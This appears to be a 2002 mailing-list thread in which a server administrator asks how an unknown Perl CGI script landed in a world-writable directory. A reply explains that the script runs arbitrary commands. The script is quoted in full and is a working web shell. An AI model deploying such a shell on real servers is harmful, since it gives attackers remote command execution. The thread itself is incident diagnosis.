Any idea as to how it got on my server.  It is owned by apache and in the
apache group.  That tells me that it was put on there by apache.  It is in a
directory that has the permissions 777 because the script that is normally
in there keeps and writes traffic information, so I guess someone found a
way to have apache write the file into that directory.  But how did they get
it to chmod 755?
John michael

> On Thu, 21 Mar 2002, John Michael wrote:
> > #!/usr/bin/perl
> > use CGI qw(:standard);
> > print header;
> > my $k=param("g");
> > my $a=param("s");
> > if ($a || $k) {
> >     $l=`$k 2>&1`;
> >     print start_form,textarea("g",$k,1,50);
> >     print submit("sc");
> >     print end_form;
> >     print pre($l);
> > }
> > print $ENV{"SERVER_NAME"};
> It executes arbitrary commands as <whatever your httpds run as>.
> --
> Chris Reinhardt
> Systems Architect
> Dynamic DNS Network Services

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